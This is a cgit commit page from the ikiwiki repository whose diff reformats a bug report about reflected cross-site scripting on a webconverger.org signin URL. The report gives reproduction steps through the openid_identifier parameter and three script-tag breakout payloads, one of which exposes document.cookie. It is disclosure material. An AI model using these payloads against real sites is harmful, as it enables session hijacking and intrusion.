aboutsummaryrefslogtreecommitdiff
path: root/doc/bugs/XSS_Alert...__33____33____33__.mdwn
diff options
context:
space:
mode:
authorhttp://smcv.pseudorandom.co.uk/ <smcv@web>2015-03-30 06:56:25 -0400
committeradmin <admin@branchable.com>2015-03-30 06:56:25 -0400
commit7da5085589208573b16afd8a9516cffede43e18c (patch)
treec004d3794d20ce982590719cd7f14497d669a8ab /doc/bugs/XSS_Alert...__33____33____33__.mdwn
parentc68c044d8743d83ae5a845a2c800a3b03a7d7350 (diff)
downloadikiwiki-7da5085589208573b16afd8a9516cffede43e18c.tar
ikiwiki-7da5085589208573b16afd8a9516cffede43e18c.tar.gz
fix formatting
Diffstat (limited to 'doc/bugs/XSS_Alert...__33____33____33__.mdwn')
-rw-r--r--doc/bugs/XSS_Alert...__33____33____33__.mdwn8
1 files changed, 5 insertions, 3 deletions
diff --git a/doc/bugs/XSS_Alert...__33____33____33__.mdwn b/doc/bugs/XSS_Alert...__33____33____33__.mdwn
index 436e3faae..2c147073a 100644
--- a/doc/bugs/XSS_Alert...__33____33____33__.mdwn
+++ b/doc/bugs/XSS_Alert...__33____33____33__.mdwn
@@ -5,14 +5,16 @@ Vulnerable Links:
webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
How To Reproduce The Vulnerability :
+
1. Go to this link : webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
2. refresh the page and intercept the http request using "brup suite" then at parameter "openid_identifier=" put xss payload
3. forward the request
XSS Payload :
-1. "></script><script>prompt(909043)</script>
-2. "></script><script>prompt("XSS Alert...!!! : Hacked By Raghav Bisht")</script>
-3. "></script><script>prompt(document.cookie)</script>
+
+1. `"></script><script>prompt(909043)</script>`
+2. `"></script><script>prompt("XSS Alert...!!! : Hacked By Raghav Bisht")</script>`
+3. `"></script><script>prompt(document.cookie)</script>`
NOTE : Proof of concept is attached.
generated by cgit v1.2.3 (git 2.25.4) at 2024-05-17 00:06:01 +0000